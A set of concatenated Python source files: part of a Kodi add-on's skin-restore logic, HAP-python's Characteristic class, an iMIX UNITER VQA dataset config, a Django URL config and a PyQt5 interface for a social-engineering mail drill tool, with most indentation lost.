control.setSetting(item.replace('lookandfeel', 'default'), match[0])
control.log("%s saved to %s" % (item, match[0]))
else:
for item in scan:
value = setting(item.replace('lookandfeel', 'default'))
query = '{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"%s","value":%s}, "id":1}' % (item, value)
response = control.jsonrpc(query)
control.log("%s restored to %s" % (item, value))
def defaultSkin():
control.log("[Default Skin Check]")
tempgui = os.path.join(USERDATAPATH, 'guitemp.xml')
gui = tempgui if os.path.exists(tempgui) else GUISETTINGS
if not os.path.exists(gui): return False
control.log("Reading gui file: %s" % gui)
guif = open(gui, 'r+')
msg = guif.read().replace('\n','').replace('\r','').replace('\t','').replace(' ',''); guif.close()
control.log("Opening gui settings")
match = re.compile('<lookandfeel>.+?<ski.+?>(.+?)</skin>.+?</lookandfeel>').findall(msg)
control.log("Matches: %s" % str(match))
if len(match) > 0:
skinid = match[0]
addonxml = os.path.join(ADDONS, match[0], 'addon.xml')
if os.path.exists(addonxml):
addf = open(addonxml, 'r+')
msg2 = addf.read().replace('\n','').replace('\r','').replace('\t',''); addf.close()
match2 = re.compile('<addon.+?ame="(.+?)".+?>').findall(msg2)
if len(match2) > 0: skinname = match2[0]
else: skinname = 'no match'
else: skinname = 'no file'
control.log("[Default Skin Check] Skin name: %s" % skinname)
control.log("[Default Skin Check] Skin id: %s" % skinid)
control.setSetting('defaultskin', skinid)
control.setSetting('defaultskinname', skinname)
control.setSetting('defaultskinignore', 'false')
if os.path.exists(tempgui):
control.log("Deleting Temp Gui File.")
os.remove(tempgui)
control.log("[Default Skin Check] End")
def checkSkin():
control.loga("Invalid Skin Check Start")
DEFAULTSKIN = setting('defaultskin')
DEFAULTNAME = setting('defaultskinname')
DEFAULTIGNORE = setting('defaultskinignore')
gotoskin = False
if not DEFAULTSKIN == '':
if os.path.exists(os.path.join(ADDONS, DEFAULTSKIN)):
if DIALOG.yesno(AddonTitle, "[COLOR %s]It seems that the skin has been set back to [COLOR %s]%s[/COLOR]" % (COLOR2, COLOR1, SKIN[5:].title()), "Would you like to set the skin back to:[/COLOR]", '[COLOR %s]%s[/COLOR]' % (COLOR1, DEFAULTNAME)):
gotoskin = DEFAULTSKIN
gotoname = DEFAULTNAME
else: control.loga("Skin was not reset"); control.setSetting('defaultskinignore', 'true'); gotoskin = False
else: control.setSetting('defaultskin', ''); control.setSetting('defaultskinname', ''); DEFAULTSKIN = ''; DEFAULTNAME = ''
if DEFAULTSKIN == '':
skinname = []
skinlist = []
for folder in glob.glob(os.path.join(ADDONS, 'skin.*/')):
xml = "%s/addon.xml" % folder
if os.path.exists(xml):
f = open(xml,mode='r'); g = f.read().replace('\n','').replace('\r','').replace('\t',''); f.close();
match = re.compile('<addon.+?id="(.+?)".+?>').findall(g)
match2 = re.compile('<addon.+?name="(.+?)".+?>').findall(g)
control.loga("%s: %s" % (folder, str(match[0])))
if len(match) > 0: skinlist.append(str(match[0])); skinname.append(str(match2[0]))
else: control.loga("ID not found for %s" % folder)
else: control.loga("ID not found for %s" % folder)
if len(skinlist) > 0:
if len(skinlist) > 1:
                if DIALOG.yesno(control.AddonTitle, "[COLOR %s]It seems that the skin has been set back to [COLOR %s]%s[/COLOR]" % (COLOR2, COLOR1, SKIN[5:].title()), "Would you like to view a list of available skins?[/COLOR]"):
choice = DIALOG.select("Select skin to switch to!", skinname)
if choice == -1: control.loga("Skin was not reset"); control.setSetting('defaultskinignore', 'true')
else:
gotoskin = skinlist[choice]
gotoname = skinname[choice]
else: control.loga("Skin was not reset"); control.setSetting('defaultskinignore', 'true')
else:
if DIALOG.yesno(control.AddonTitle, "It seems that the skin has been set back to [B]%s[/B]" % (SKIN[5:].title()), "Would you like to set the skin back to: ", '[B] %s [/B]' % (skinname[0])):
gotoskin = skinlist[0]
gotoname = skinname[0]
else: control.loga("Skin was not reset"); control.setSetting('defaultskinignore', 'true')
else: control.loga("No skins found in addons folder."); control.setSetting('defaultskinignore', 'true'); gotoskin = False
if gotoskin:
swapSkins(gotoskin)
x = 0
control.sleep(1000)
while not control.condVisibility("Window.isVisible(yesnodialog)") and x < 150:
x += 1
control.sleep(200)
if control.condVisibility("Window.isVisible(yesnodialog)"):
control.execute('SendClick(11)')
lookandFeelData('restore')
else: control.Notify(control.AddonTitle,'Skin Swap Timed Out!')
control.loga("Invalid Skin Check End")
pyhap/characteristic.py | bdraco/HAP-python | py | Python | 10,360 bytes | Apache-2.0
"""
All things for a HAP characteristic.
A Characteristic is the smallest unit of the smart home, e.g.
a temperature measuring or a device status.
"""
import logging
from pyhap.const import (
HAP_PERMISSION_READ,
HAP_REPR_DESC,
HAP_REPR_FORMAT,
HAP_REPR_IID,
HAP_REPR_MAX_LEN,
HAP_REPR_PERM,
HAP_REPR_TYPE,
HAP_REPR_VALID_VALUES,
HAP_REPR_VALUE,
)
from .util import hap_type_to_uuid, uuid_to_hap_type
logger = logging.getLogger(__name__)
# ### HAP Format ###
HAP_FORMAT_BOOL = "bool"
HAP_FORMAT_INT = "int"
HAP_FORMAT_FLOAT = "float"
HAP_FORMAT_STRING = "string"
HAP_FORMAT_ARRAY = "array"
HAP_FORMAT_DICTIONARY = "dictionary"
HAP_FORMAT_UINT8 = "uint8"
HAP_FORMAT_UINT16 = "uint16"
HAP_FORMAT_UINT32 = "uint32"
HAP_FORMAT_UINT64 = "uint64"
HAP_FORMAT_DATA = "data"
HAP_FORMAT_TLV8 = "tlv8"
HAP_FORMAT_DEFAULTS = {
HAP_FORMAT_BOOL: False,
HAP_FORMAT_INT: 0,
HAP_FORMAT_FLOAT: 0.0,
HAP_FORMAT_STRING: "",
HAP_FORMAT_ARRAY: "",
HAP_FORMAT_DICTIONARY: "",
HAP_FORMAT_UINT8: 0,
HAP_FORMAT_UINT16: 0,
HAP_FORMAT_UINT32: 0,
HAP_FORMAT_UINT64: 0,
HAP_FORMAT_DATA: "",
HAP_FORMAT_TLV8: "",
}
HAP_FORMAT_NUMERICS = (
HAP_FORMAT_INT,
HAP_FORMAT_FLOAT,
HAP_FORMAT_UINT8,
HAP_FORMAT_UINT16,
HAP_FORMAT_UINT32,
HAP_FORMAT_UINT64,
)
# ### HAP Units ###
HAP_UNIT_ARC_DEGREE = "arcdegrees"
HAP_UNIT_CELSIUS = "celsius"
HAP_UNIT_LUX = "lux"
HAP_UNIT_PERCENTAGE = "percentage"
HAP_UNIT_SECONDS = "seconds"
# ### Properties ###
PROP_FORMAT = "Format"
PROP_MAX_VALUE = "maxValue"
PROP_MIN_STEP = "minStep"
PROP_MIN_VALUE = "minValue"
PROP_PERMISSIONS = "Permissions"
PROP_UNIT = "unit"
PROP_VALID_VALUES = "ValidValues"
PROP_NUMERIC = (PROP_MAX_VALUE, PROP_MIN_VALUE, PROP_MIN_STEP, PROP_UNIT)
class CharacteristicError(Exception):
"""Generic exception class for characteristic errors."""
class Characteristic:
"""Represents a HAP characteristic, the smallest unit of the smart home.
A HAP characteristic is some measurement or state, like battery status or
the current temperature. Characteristics are contained in services.
Each characteristic has a unique type UUID and a set of properties,
like format, min and max values, valid values and others.
"""
__slots__ = (
"broker",
"display_name",
"properties",
"type_id",
"value",
"getter_callback",
"setter_callback",
"service",
"_uuid_str",
"_loader_display_name",
)
def __init__(self, display_name, type_id, properties):
"""Initialise with the given properties.
:param display_name: Name that will be displayed for this
characteristic, i.e. the `description` in the HAP representation.
:type display_name: str
:param type_id: UUID unique to this type of characteristic.
:type type_id: uuid.UUID
:param properties: A dict of properties, such as Format,
ValidValues, etc.
:type properties: dict
"""
self.broker = None
self.display_name = display_name
self.properties = properties
self.type_id = type_id
self.value = self._get_default_value()
self.getter_callback = None
self.setter_callback = None
self.service = None
self._uuid_str = uuid_to_hap_type(type_id)
self._loader_display_name = None
def __repr__(self):
"""Return the representation of the characteristic."""
return "<characteristic display_name={} value={} properties={}>".format(
self.display_name, self.value, self.properties
)
def _get_default_value(self):
"""Return default value for format."""
if self.properties.get(PROP_VALID_VALUES):
return min(self.properties[PROP_VALID_VALUES].values())
value = HAP_FORMAT_DEFAULTS[self.properties[PROP_FORMAT]]
return self.to_valid_value(value)
def get_value(self):
"""This is to allow for calling `getter_callback`
:return: Current Characteristic Value
"""
if self.getter_callback:
# pylint: disable=not-callable
self.value = self.to_valid_value(value=self.getter_callback())
return self.value
def to_valid_value(self, value):
"""Perform validation and conversion to valid value."""
if self.properties.get(PROP_VALID_VALUES):
if value not in self.properties[PROP_VALID_VALUES].values():
error_msg = "{}: value={} is an invalid value.".format(
self.display_name, value
)
logger.error(error_msg)
raise ValueError(error_msg)
elif self.properties[PROP_FORMAT] == HAP_FORMAT_STRING:
value = str(value)[:256]
elif self.properties[PROP_FORMAT] == HAP_FORMAT_BOOL:
value = bool(value)
elif self.properties[PROP_FORMAT] in HAP_FORMAT_NUMERICS:
if not isinstance(value, (int, float)):
error_msg = "{}: value={} is not a numeric value.".format(
self.display_name, value
)
logger.error(error_msg)
raise ValueError(error_msg)
value = min(self.properties.get(PROP_MAX_VALUE, value), value)
value = max(self.properties.get(PROP_MIN_VALUE, value), value)
return value
def override_properties(self, properties=None, valid_values=None):
"""Override characteristic property values and valid values.
:param properties: Dictionary with values to override the existing
properties. Only changed values are required.
:type properties: dict
:param valid_values: Dictionary with values to override the existing
valid_values. Valid values will be set to new dictionary.
:type valid_values: dict
"""
if not properties and not valid_values:
raise ValueError("No properties or valid_values specified to override.")
if properties:
self.properties.update(properties)
if valid_values:
self.properties[PROP_VALID_VALUES] = valid_values
try:
self.value = self.to_valid_value(self.value)
except ValueError:
self.value = self._get_default_value()
def set_value(self, value, should_notify=True):
"""Set the given raw value. It is checked if it is a valid value.
If not set_value will be aborted and an error message will be
displayed.
`Characteristic.setter_callback`
You may also define a `setter_callback` on the `Characteristic`.
This will be called with the value being set as the arg.
.. seealso:: Characteristic.value
:param value: The value to assign as this Characteristic's value.
:type value: Depends on properties["Format"]
        :param should_notify: Whether the change should be sent to
subscribed clients. Notify will be performed if the broker is set.
:type should_notify: bool
"""
logger.debug("set_value: %s to %s", self.display_name, value)
value = self.to_valid_value(value)
self.value = value
if should_notify and self.broker:
self.notify()
def client_update_value(self, value, sender_client_addr=None):
"""Called from broker for value change in Home app.
Change self.value to value and call callback.
"""
logger.debug(
"client_update_value: %s to %s from client: %s",
self.display_name,
value,
sender_client_addr,
)
self.value = value
self.notify(sender_client_addr)
if self.setter_callback:
# pylint: disable=not-callable
self.setter_callback(value)
def notify(self, sender_client_addr=None):
"""Notify clients about a value change. Sends the value.
.. seealso:: accessory.publish
.. seealso:: accessory_driver.publish
"""
self.broker.publish(self.value, self, sender_client_addr)
# pylint: disable=invalid-name
def to_HAP(self):
"""Create a HAP representation of this Characteristic.
Used for json serialization.
:return: A HAP representation.
:rtype: dict
"""
hap_rep = {
HAP_REPR_IID: self.broker.iid_manager.get_iid(self),
HAP_REPR_TYPE: self._uuid_str,
HAP_REPR_PERM: self.properties[PROP_PERMISSIONS],
HAP_REPR_FORMAT: self.properties[PROP_FORMAT],
}
# HAP_REPR_DESC (description) is optional and takes up
# quite a bit of space in the payload. Only include it
# if it has been changed from the default loader version
if (
not self._loader_display_name
or self._loader_display_name != self.display_name
):
hap_rep[HAP_REPR_DESC] = self.display_name
value = self.get_value()
if self.properties[PROP_FORMAT] in HAP_FORMAT_NUMERICS:
hap_rep.update(
{k: self.properties[k] for k in self.properties.keys() & PROP_NUMERIC}
)
if PROP_VALID_VALUES in self.properties:
hap_rep[HAP_REPR_VALID_VALUES] = sorted(
self.properties[PROP_VALID_VALUES].values()
)
elif self.properties[PROP_FORMAT] == HAP_FORMAT_STRING:
if len(value) > 64:
hap_rep[HAP_REPR_MAX_LEN] = min(len(value), 256)
if HAP_PERMISSION_READ in self.properties[PROP_PERMISSIONS]:
hap_rep[HAP_REPR_VALUE] = value
return hap_rep
@classmethod
def from_dict(cls, name, json_dict, from_loader=False):
"""Initialize a characteristic object from a dict.
:param json_dict: Dictionary containing at least the keys `Format`,
`Permissions` and `UUID`
:type json_dict: dict
"""
type_id = hap_type_to_uuid(json_dict.pop("UUID"))
char = cls(name, type_id, properties=json_dict)
if from_loader:
char._loader_display_name = ( # pylint: disable=protected-access
char.display_name
)
return char
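# A minimal usage sketch (hypothetical values, not part of the original module):
#   props = {"Format": HAP_FORMAT_BOOL, "Permissions": ["pr", "pw"]}
#   char = Characteristic("On", hap_type_to_uuid("25"), props)
#   char.set_value(True, should_notify=False)  # no broker attached yet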
configs/_base_/datasets/uniter/vqa_dataset_uniter.py | linxi1158/iMIX | py | Python | 1,767 bytes | Apache-2.0 | 23 stars
dataset_type = 'UNITER_VqaDataset'
data_root = '/home/datasets/mix_data/UNITER/VQA/'
train_datasets = ['train']
test_datasets = ['minival']  # name is not used here, but one must be defined for the run
vqa_cfg = dict(
train_txt_dbs=[
data_root + 'vqa_train.db',
data_root + 'vqa_trainval.db',
data_root + 'vqa_vg.db',
],
train_img_dbs=[
data_root + 'coco_train2014/',
data_root + 'coco_val2014',
data_root + 'vg/',
],
val_txt_db=data_root + 'vqa_devval.db',
val_img_db=data_root + 'coco_val2014/',
ans2label_file=data_root + 'ans2label.json',
max_txt_len=60,
conf_th=0.2,
max_bb=100,
min_bb=10,
num_bb=36,
train_batch_size=20480, # 5120,
val_batch_size=40960, # 10240,
)
BUCKET_SIZE = 8192
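# Note: TokenBucketSampler batches by token budget, so the batch sizes above
# (20480 / 40960) are token counts per batch, not sample counts. (Assumption
# based on the upstream UNITER sampler.)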
train_data = dict(
samples_per_gpu=vqa_cfg['train_batch_size'],
workers_per_gpu=4,
pin_memory=True,
batch_sampler=dict(
type='TokenBucketSampler',
bucket_size=BUCKET_SIZE,
batch_size=vqa_cfg['train_batch_size'],
drop_last=True,
size_multiple=8,
),
data=dict(
type=dataset_type,
datacfg=vqa_cfg,
train_or_val=True,
),
)
test_data = dict(
samples_per_gpu=vqa_cfg['val_batch_size'],
workers_per_gpu=4,
batch_sampler=dict(
type='TokenBucketSampler',
bucket_size=BUCKET_SIZE,
batch_size=vqa_cfg['val_batch_size'],
drop_last=False,
size_multiple=8,
),
pin_memory=True,
data=dict(
type=dataset_type,
datacfg=vqa_cfg,
train_or_val=False,
),
)
post_processor = dict(
type='Evaluator',
metrics=[dict(type='UNITER_AccuracyMetric')],
dataset_converters=[dict(type='UNITER_DatasetConverter')],
)
students/k3340/laboratory_works/laboratory_works/Arlakov_Denis/laboratiry_work_2_and_3/lab/django-react-ecommerce-master/home/urls.py | TonikX/ITMO_ICT_-WebProgramming_2020 | py | Python | 752 bytes | MIT | 10 stars
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path, include, re_path
from django.views.generic import TemplateView
urlpatterns = [
path('api-auth/', include('rest_framework.urls')),
path('rest-auth/', include('rest_auth.urls')),
path('rest-auth/registration/', include('rest_auth.registration.urls')),
path('admin/', admin.site.urls),
path('api/', include('core.api.urls')),
]
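# In development, serve user-uploaded media files directly from Django.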
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
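# In production, route all unmatched URLs to the React SPA's index.html.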
if not settings.DEBUG:
urlpatterns += [re_path(r'^.*',
TemplateView.as_view(template_name='index.html'))]
20200416_Socialmail/mailserverUi.py | karta1782310/python-docx-automated-report-generation | py | Python | 22,881 bytes | MIT
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# All the basic PyQt5 widgets used by the UI are imported here
from PyQt5.QtWebEngineWidgets import QWebEngineView
from PyQt5.QtWidgets import (QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog,
QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit,
QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView)
from PyQt5.QtGui import QPalette, QColor, QBrush
from PyQt5.QtCore import Qt, QDateTime
from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions
import qdarkstyle, sys
import mylibrary.genmail as gm
from GenAndSendMail import insert_send_mail
from server.database import Database
from server.sendmail import Smtp
from server.client import Client
from email import generator
from pandas import DataFrame
from copy import deepcopy
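# Popup window used to send a test email to a single recipient.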
class SubWindow(QWidget):
def __init__(self):
super().__init__()
self.resize(400,100)
self.main_layout = QGridLayout()
self.setLayout(self.main_layout)
self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
self.main_layout.addWidget(QLabel('收件人'), 0, 0, 1, 1)
self.in_recipient = QLineEdit()
self.main_layout.addWidget(self.in_recipient, 0, 1, 1, 5)
self.btn_send = QPushButton('寄送')
self.main_layout.addWidget(self.btn_send, 1, 5, 1, 1)
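# Main application window: a column of action buttons on the left; the right
# pane is cleared and rebuilt for whichever action is selected.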
class MailserverUi(QMainWindow):
def __init__(self):
super().__init__()
setConfigOption('background', '#19232D')
setConfigOption('foreground', 'd')
setConfigOptions(antialias = True)
# self.resize(720,500)
self.init_ui()
self.data_smtp = []
self.data_db = []
self.data_logs = []
self.data_temp_logs = []
# self.sub_win = SubWindow()
        # Default status bar
        self.status = self.statusBar()
        self.status.showMessage("開發者: 鄭鈺城, 聯絡資訊: anthonycheng@systex.com")
        # Title bar
        self.setWindowTitle("社交郵件工程")
        self.setWindowOpacity(1)  # window opacity
self.main_layout.setSpacing(0)
self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
self.main_widget.setStyleSheet(
"""
QComboBox::item:checked {
height: 12px;
border: 1px solid #32414B;
margin-top: 0px;
margin-bottom: 0px;
padding: 4px;
padding-left: 0px;
}
"""
)
def init_ui(self):
        # Create the main window widget
        self.main_widget = QWidget()
        # Create a grid layout for the main widget
        self.main_layout = QGridLayout()
        # Set the grid as the main widget's layout
        self.main_widget.setLayout(self.main_layout)
        # Create the left-side widget
        self.left_widget = QWidget()
        self.left_widget.setObjectName('left_widget')
        self.left_layout = QGridLayout()
        self.left_widget.setLayout(self.left_layout)
        # Create the right-side widget
        self.right_widget = QWidget()
        self.right_widget.setObjectName('right_widget')
        self.right_layout = QGridLayout()
        self.right_widget.setLayout(self.right_layout)
        # Left widget at row 0, column 0, spanning 12 rows and 3 columns
        self.main_layout.addWidget(self.left_widget, 0, 0, 12, 3)
        # Right widget at row 0, column 3, spanning 12 rows and 8 columns
        self.main_layout.addWidget(self.right_widget, 0, 3, 12, 8)
        # Set the window's central widget
self.setCentralWidget(self.main_widget)
        # Main action buttons
self.btn_sendmail = QPushButton("發送信件")
self.btn_sendmail.clicked.connect(self.display_send_mail)
self.btn_smtp = QPushButton("系統設定")
self.btn_smtp.clicked.connect(self.display_smtp_setting)
self.btn_db = QPushButton("資料庫設定")
self.btn_db.clicked.connect(self.display_db_setting)
self.btn_update_eml = QPushButton("修改樣板")
self.btn_update_eml.clicked.connect(self.display_update_eml)
self.btn_get_logs = QPushButton("觸發明細")
self.btn_get_logs.clicked.connect(self.display_logs)
self.btn_download_logs = QPushButton("下載觸發明細")
self.btn_download_logs.clicked.connect(self.logs_download)
self.quit_btn = QPushButton("退出")
self.quit_btn.clicked.connect(self.quit_act)
self.left_layout.addWidget(self.btn_sendmail, 2, 0, 1, 3)
self.left_layout.addWidget(self.btn_smtp, 3, 0, 1, 3)
self.left_layout.addWidget(self.btn_db, 4, 0, 1, 3)
self.left_layout.addWidget(self.btn_update_eml, 5, 0, 1, 3)
self.left_layout.addWidget(self.btn_get_logs, 6, 0, 1, 3)
self.left_layout.addWidget(self.btn_download_logs, 7, 0, 1, 3)
self.left_layout.addWidget(self.quit_btn, 8, 0, 1, 3)
        # Main search field
self.in_data = QLineEdit()
self.in_data.setPlaceholderText("暫無")
self.left_layout.addWidget(self.in_data, 1, 0, 1, 3)
        # Main log table
self.query_result = QTableWidget()
self.left_layout.addWidget(self.query_result, 9, 0, 2, 3)
self.query_result.verticalHeader().setVisible(False)
self.right_display = GraphicsLayoutWidget()
self.right_layout.addWidget(self.right_display, 0, 3, 12, 8)
        # Right-side widgets: send mail
self.in_eml_type = QLineEdit()
self.in_eml_template = QLineEdit()
self.btn_eml_browse = QPushButton('瀏覽')
self.btn_eml_browse.clicked.connect(lambda: self.open_eml(self.in_eml_template))
self.in_recipient_group = QLineEdit()
self.in_recipient_excel = QLineEdit()
self.btn_recipient_browse = QPushButton('瀏覽')
self.btn_recipient_browse.clicked.connect(lambda: self.open_excel(self.in_recipient_excel))
self.in_annex_file = QLineEdit()
self.btn_annex_file = QPushButton('瀏覽')
self.btn_annex_file.clicked.connect(lambda: self.open_word(self.in_annex_file))
self.in_scheduler = QDateTimeEdit(QDateTime.currentDateTime())
self.in_scheduler.setCalendarPopup(True)
self.in_scheduler.setDisplayFormat('yyyy-MM-dd hh:mm')
self.cb_scheduler = QCheckBox('使用')
self.btn_sendmail_start = QPushButton('執行')
self.btn_sendmail_start.clicked.connect(self.send_mail)
        # Right-side widgets: SMTP settings
self.in_smtp_host = QLineEdit()
self.in_smtp_port = QLineEdit()
self.in_smtp_user = QLineEdit()
self.in_smtp_password = QLineEdit()
self.cb_smtp_ssl = QCheckBox('使用')
self.in_smtp_test = QLineEdit()
self.btn_smtp_save = QPushButton('儲存')
self.btn_smtp_save.clicked.connect(lambda: self.save_data(self.data_smtp))
self.btn_smtp_test = QPushButton('測試')
self.btn_smtp_test.clicked.connect(self.show_sub_win)
        # Right-side widgets: database settings
self.in_db_host = QLineEdit()
self.in_db_port = QLineEdit()
self.in_db_user = QLineEdit()
self.in_db_password = QLineEdit()
self.in_db_database = QLineEdit()
self.in_db_domain = QLineEdit()
self.in_db_domain.setPlaceholderText('回收風險資訊動作的網址')
self.btn_db_save = QPushButton('儲存')
self.btn_db_save.clicked.connect(lambda: self.save_data(self.data_db))
        # Right-side widgets: eml template editing
self.in_edit_sender = QLineEdit()
self.in_edit_sender_name = QLineEdit()
self.cb_edit_annex = QCheckBox('是')
self.in_edit_annex = QLineEdit()
self.btn_edit_annex = QPushButton('瀏覽')
self.btn_edit_annex.clicked.connect(lambda: self.open_annex(self.in_edit_annex))
self.in_edit_subject = QLineEdit()
self.mail_tab = QTabWidget()
self.mail_tab.setDocumentMode(True)
self.mail_tab.currentChanged.connect(self.print_html)
self.mail_tab_1 = QWidget()
self.mail_tab_2 = QWidget()
self.mail_tab.addTab(self.mail_tab_1, 'Html')
self.mail_tab.addTab(self.mail_tab_2, 'Web')
self.tab_1 = QGridLayout()
self.tab_2 = QGridLayout()
self.tab_1.setContentsMargins(0,0,0,0)
self.tab_2.setContentsMargins(0,0,0,0)
self.mail_tab_1.setLayout(self.tab_1)
self.mail_tab_2.setLayout(self.tab_2)
self.in_edit_html = QTextEdit()
self.in_edit_web = QWebEngineView()
self.tab_1.addWidget(self.in_edit_html, 1, 1, 1, 1)
self.tab_2.addWidget(self.in_edit_web, 1, 1, 1, 1)
self.btn_edit_eml_reset = QPushButton('清除')
self.btn_edit_eml_reset.clicked.connect(self.eml_reset)
self.btn_edit_eml_read = QPushButton('讀取')
self.btn_edit_eml_read.clicked.connect(self.eml_open)
self.btn_edit_eml_save = QPushButton('儲存')
self.btn_edit_eml_save.clicked.connect(self.eml_save)
        # Right-side widgets: logs
self.tbw_logs = QTableWidget()
self.tbw_logs.verticalHeader().setVisible(False)
self.cmb_logs_choice = QComboBox()
self.in_logs_data = QLineEdit()
self.in_logs_data.setPlaceholderText("輸入資料")
self.btn_logs_search = QPushButton('執行')
self.btn_logs_search.clicked.connect(self.logs_change)
def display_send_mail(self):
self.clear_layout(self.right_layout)
labels = [ "信件類型 :", "信件模板 :", " 收件人群組 :", "收件人資料 :", '附件資料 :',"設定排程 :"]
for i, label in enumerate(labels):
self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight)
self.right_layout.addWidget(self.in_eml_type, 0, 4, 1, 7)
self.right_layout.addWidget(self.in_eml_template, 1, 4, 1, 6)
self.right_layout.addWidget(self.btn_eml_browse, 1, 10, 1, 1)
self.right_layout.addWidget(self.in_recipient_group, 2, 4, 1, 7)
self.right_layout.addWidget(self.in_recipient_excel, 3, 4, 1, 6)
self.right_layout.addWidget(self.btn_recipient_browse, 3, 10, 1, 1)
self.right_layout.addWidget(self.in_annex_file , 4, 4, 1, 6)
self.right_layout.addWidget(self.btn_annex_file, 4, 10, 1, 1)
self.right_layout.addWidget(self.in_scheduler, 5, 4, 1, 6)
self.right_layout.addWidget(self.cb_scheduler, 5, 10, 1, 1)
self.right_layout.addWidget(self.btn_sendmail_start, 6, 9, 1, 2)
def display_smtp_setting(self):
self.clear_layout(self.right_layout)
        # Add widgets to the right pane
labels = ["SMTP HOST :", "SMTP PORT :", "SMTP 帳號 :", "SMTP 密碼 :", "SMTP SSL :", " 測試信件內容 :"]
for i, label in enumerate(labels):
self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight)
self.right_layout.addWidget(self.in_smtp_host, 0, 4, 1, 7)
self.right_layout.addWidget(self.in_smtp_port, 1, 4, 1, 7)
self.right_layout.addWidget(self.in_smtp_user, 2, 4, 1, 7)
self.right_layout.addWidget(self.in_smtp_password, 3, 4, 1, 7)
self.right_layout.addWidget(self.cb_smtp_ssl, 4, 4, 1, 7)
self.right_layout.addWidget(self.in_smtp_test, 5, 4, 1, 7)
self.right_layout.addWidget(self.btn_smtp_save, 6, 9, 1, 2)
self.right_layout.addWidget(self.btn_smtp_test, 6, 7, 1, 2)
def display_db_setting(self):
self.clear_layout(self.right_layout)
        # Add widgets to the right pane
labels = ["資料庫 HOST :", "資料庫 PORT :", "資料庫 帳號 :", "資料庫 密碼 :", "使用資料庫名稱 :", "回收網址 :"]
for i, label in enumerate(labels):
self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight)
self.right_layout.addWidget(self.in_db_host, 0, 4, 1, 7)
self.right_layout.addWidget(self.in_db_port, 1, 4, 1, 7)
self.right_layout.addWidget(self.in_db_user, 2, 4, 1, 7)
self.right_layout.addWidget(self.in_db_password, 3, 4, 1, 7)
self.right_layout.addWidget(self.in_db_database, 4, 4, 1, 7)
self.right_layout.addWidget(self.in_db_domain, 5, 4, 1, 7)
self.right_layout.addWidget(self.btn_db_save, 6, 9, 1, 2)
def display_update_eml(self):
self.clear_layout(self.right_layout)
labels = ["寄件人 :", "寄件人名稱 :", " 是否加入附件 :", "附件名稱 :", "主旨 :", "內容 :"]
for i, label in enumerate(labels):
self.label = QLabel(label)
self.right_layout.addWidget(self.label, i, 3, 1, 1, Qt.AlignRight)
self.right_layout.addWidget(self.in_edit_sender, 0, 4, 1, 7)
self.right_layout.addWidget(self.in_edit_sender_name, 1, 4, 1, 7)
self.right_layout.addWidget(self.cb_edit_annex, 2, 4, 1, 7)
self.right_layout.addWidget(self.in_edit_annex, 3, 4, 1, 6)
self.right_layout.addWidget(self.btn_edit_annex, 3, 10, 1, 1)
self.right_layout.addWidget(self.in_edit_subject, 4, 4, 1, 7)
self.right_layout.addWidget(self.mail_tab, 5, 4, 6, 7)
self.right_layout.addWidget(self.btn_edit_eml_reset, 11, 5, 1, 2)
self.right_layout.addWidget(self.btn_edit_eml_read, 11, 7, 1, 2)
self.right_layout.addWidget(self.btn_edit_eml_save, 11, 9, 1, 2)
def display_logs(self):
self.data_temp_logs = []
self.tbw_logs.setRowCount(0)
self.clear_layout(self.right_layout)
self.right_layout.addWidget(self.tbw_logs, 1, 3, 11, 8)
self.right_layout.addWidget(QLabel('查詢 :'), 0, 3, 1, 1)
self.right_layout.addWidget(self.cmb_logs_choice, 0, 4, 1, 2)
self.right_layout.addWidget(self.in_logs_data, 0, 6, 1, 3)
self.right_layout.addWidget(self.btn_logs_search, 0, 9, 1, 2)
try:
db = Database(self.data_db[0], int(self.data_db[1]), self.data_db[2], self.data_db[3], self.data_db[4]) if self.data_db[:5] else Database()
self.data_logs = db.get_logs()
self.data_temp_logs = deepcopy(self.data_logs)
if self.data_logs:
row_num = len(self.data_logs)
col_num = len(self.data_logs[0])
col_lst = list(self.data_logs[0].keys())
self.cmb_logs_choice.clear()
self.cmb_logs_choice.addItems(col_lst)
self.tbw_logs.setRowCount(row_num)
self.tbw_logs.setColumnCount(col_num)
self.tbw_logs.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)
self.tbw_logs.setHorizontalHeaderLabels(col_lst)
for i in range(row_num):
row_data = list(self.data_logs[i].values())
for j in range(col_num):
temp_data = row_data[j]
item = QTableWidgetItem(str(temp_data))
item.setForeground(QBrush(QColor(144, 182, 240)))
self.tbw_logs.setItem(i, j, item)
        except Exception:
QMessageBox.warning(self, 'Failed!', '資料庫連結失敗!', QMessageBox.Ok)
else:
db.__disconnect__()
def get_items_from_layout(self, layout):
return [layout.itemAt(i).widget() for i in range(layout.count())]
def save_data(self, data):
items = self.get_items_from_layout(self.right_layout)
data.clear()
try:
for item in items:
if type(item) == type(QLineEdit()):
data.append(item.text())
elif type(item) == type(QCheckBox()):
data.append(item.isChecked())
QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok)
        except Exception:
QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)
print(data)
def clear_layout(self, layout):
for i in reversed(range(layout.count())):
layout.itemAt(i).widget().setParent(None)
def open_eml(self, obj):
file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Eml Files (*.eml)")
obj.setText(file_name)
def open_excel(self, obj):
file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Excel Files (*.xlsx)")
obj.setText(file_name)
def open_word(self, obj):
file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Word Files (*.doc *.docx)")
obj.setText(file_name)
def open_annex(self, obj):
file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Annex Files (*.jpg *.png *.zip)")
org_files = obj.text()
